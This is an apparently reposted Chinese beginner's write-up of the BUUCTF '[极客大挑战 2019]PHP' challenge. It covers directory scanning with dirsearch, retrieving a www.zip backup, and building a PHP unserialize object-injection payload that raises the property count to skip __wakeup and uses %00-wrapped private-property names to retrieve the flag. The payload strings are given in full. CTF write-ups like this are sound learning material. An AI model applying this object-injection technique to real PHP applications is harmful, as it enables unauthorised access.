[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂

今天来做以下buuctf里面的  [极客大挑战 2019]PHP

这道题主要考到了php的反序列化

话不多说开始演示(小白也能看懂哦)

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第1张图片

打开链接我们可以看到一只乱动的小猫

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第2张图片

他说:每次小猫都会在键盘上乱跳,所以我有一个良好的备份习惯。

这里我们可以获取到在这个网页中还存在着一个备份网站

于是我们用dirsezrch扫一下(这个工具在kali里面)

dirsearch -u http://f3c1575a-0f81-42eb-bc0d-21f70ac635b0.node4.buuoj.cn:81
 

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第3张图片

然后我们发现了一个www.zip文件把他下载下来 (直接在url网址后面拼接就可以)

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第4张图片然后我们得到了5个文件,打开看看

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第5张图片

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第6张图片

flag不可能存在这么明显的地方,根本不用试

index.php

 

从这里我们可以知道 传参方式为GET传参

传的值是select

 $res=unserialize(@$select);  这段代码的作用是将一个字符串反序列化为一个PHP变量。

class.php

username = $username;
        $this->password = $password;
    }

    function __wakeup(){
        $this->username = 'guest';
// __wakeup  在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup()
所以我们要将 2 改为 3 或者 比2大的数字

同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格
    }

    function __destruct(){
        if ($this->password != 100) {
            echo "
NO!!!hacker!!!
"; echo "You name is: "; echo $this->username;echo "
"; echo "You password is: "; echo $this->password;echo "
"; die(); } if ($this->username === 'admin') { global $flag; echo $flag; }else{ echo "
hello my friend~~
sorry i can't give you the flag!"; die(); } } } ?>

在这个里面我们可以知道

username=admin

password=100

然后开始编写我们的反序列化代码,构造我们的payload




//$res=unserialize(@$select);
这段代码的作用是将一个字符串反序列化为一个PHP变量。 
 
代码的步骤如下: 
1. @$select 表示选择变量$select的值,如果$select存在则取其值,否则返回空值。 
2. unserialize() 函数将字符串反序列化为一个PHP变量。 
3. 将反序列化后的结果赋值给$res变量。

然后我们拿到本地去跑一下,得到了一串东西,这就是反序列化的代码,也是我们需要传参的payload

O:4:"Name":2:{s:14:"Nameusername";s:5:"admin";s:14:"Namepassword";s:3:"100";}

解读一下
O:表示对象            O表示对象,1表示对象名的字符串长度,'a'是对象名,0是对象内属性个数 1
4:代表的是你定义的类  这里是定义了一个名为Name的类  有四个字符串
2是对象内属性的个数  
s: 代表的字符串
14:代表的字符串的长度
而我们的Nameusername 只有12个字符,这里的14怎么来的呢?
大家可以理解为Name 和username 是拼接起来的 所以在Name和username这里各有一个空格,所以就是14个字符了
后面的意思都一样了
但是我们拿着这串反序列化代码去执行的时候还是找不到flag

[极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第7张图片


就是我们的空格没有被实体化  这里我们需要把空格写出来
而空格的url编码是%00,下面构造我们的payload

O:4:"Name":3:{s:14:"%00Name%00username";s:5:"admin";s:14:"%00Name%00password";s:3:"100";}

然后拿着去url后面去拼接就可以得到我们的flag啦![极客大挑战 2019]PHP1全网最详细 纯小白也能看懂_第8张图片

至于上面那个2是怎么变成3的

 __wakeup  在反序列化时,当前属性个数大于实际属性个数时,就会跳过__wakeup()
所以我们要将 2 改为 3 或者 比2大的数字

同时,我们要将口变为 %00 若果不写 在我们复制的时候就会减少 空格
 

就是这样啦!到此这道题就接完了。

又什么问题小伙伴及时在品论去留言哦!

或者有不会的题也可以在评论区留言,我会及时给你们出解题思路的!

你可能感兴趣的:(android,网络安全,web安全,安全)